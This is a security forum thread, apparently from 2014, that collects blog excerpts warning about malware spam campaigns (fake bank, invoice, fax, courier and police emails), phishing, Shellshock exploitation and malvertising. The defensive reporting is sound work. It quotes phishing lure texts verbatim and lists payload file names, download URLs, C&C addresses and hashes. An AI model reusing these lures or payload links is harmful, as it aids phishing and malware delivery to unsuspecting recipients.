* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...

The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___

Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...

Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.

... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”

The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg

89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/

:fear: :mad:

AplusWebMaster
2014-09-30, 13:46
FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...

"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...

The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.

30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/

:fear: :mad:

AplusWebMaster
2014-10-01, 13:51
FYI...

Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...

Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/

** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___

Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___

Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...

All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___

More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png

There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___

Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

get copies of invoices. We will not be able to pay them. Please send clear invoices

1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___

GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___

DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/

*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/

:mad: :fear:

AplusWebMaster
2014-10-02, 13:58
FYI...

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-ids107587_815-fake-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Invoice-IDS107587_815.png

This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer

The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/41cf7ad7f6090e20412f05ef92b7b6a91499190a4ef4bc01fc52aac6cc7ed036/analysis/1412241170/
___

Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-94864-pm-shipping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...

The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...

2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f512adf0abfa86ce39d355b5c5f44be91d88012e9c3d6c2541d22c902eab4576/analysis/1412253608/

- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___

Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-photos-insurance-company-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names ands email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santander-new-edocument-arrived-fake-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/santander_statement.png

... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
['Still more XP users than Vista, Win8, and Win8.1 combined]
___

Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake-email-regarding-outstanding-amount-contains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice

This email is sent from a spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...

The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e09375d8ce97b76df1d2037a7f9511d5035a1bc35e87568995721349513386c7/analysis/1412243475/

The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD

The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/31ff7ccaae4f3fe15df8d52fe18e9017888ae13877eefbf9314e6d76cb32cefa/analysis/

:mad: :fear:

AplusWebMaster
2014-10-03, 14:54
FYI...

Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-transactions-report-users-2014-09-28-2014-09-28-fake-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:

Your requested report is attached here...

3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e836820d947de6da456a61b37f9c9cdf749a61211b52a51a2aef0aab5786239f/analysis/1412331282/
___

Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/thanks-for-shopping-with-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...

In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/file/7b255b6d648f670bd7ecbae80983230fedbce13cfcf2e93a0887fba53b5c42ad/analysis/1412334793/
___

Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-personal-reply-id-509359-word-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Office_macro.png

3October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/75fda9cc7d62d11e88ddfae10b094af5a46b87a838bbe45954cdb3c27d098b73/analysis/1412314059/
___

Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/malicious-adobe-invoice-doc-attached-to-fake-emails-adobe-creative-cloud-service-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is send from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif

The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
___

Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/securitylabs/archive/2014/10/01/malware-in-the-wild-abusing-shellshock-vulnerability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-address/208.118.61.44/information/
27.19.159.224: https://www.virustotal.com/en/ip-address/27.19.159.224/information/
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
212.227.251.139: https://www.virustotal.com/en/ip-address/212.227.251.139/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."

- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014

:fear::fear: :mad:

AplusWebMaster
2014-10-06, 15:15
FYI...

Fake Western Union invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/western-union-invoice-5751107-october-fake-pdf-malware/
6 Oct 2014 - "'invoice 5751107 October' pretending to come from Western Union Inc and quite a few others coming from a random single name like Amelia, Fred, John etc at random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8017730 Account No 5608017730.
Thanks very much
Western Union Inc. 2014 @ All rights reserved.

The earlier email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 5751107 Account No 5605751107.
Thanks very much
Amelia ...

6 October 2014: invoice_5751107.zip: Extracts to: invoice.0914.1602783433405300232.exe
Current Virus total detections: 9/55* . This invoice 5751107 October pretending to come from Western Union is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
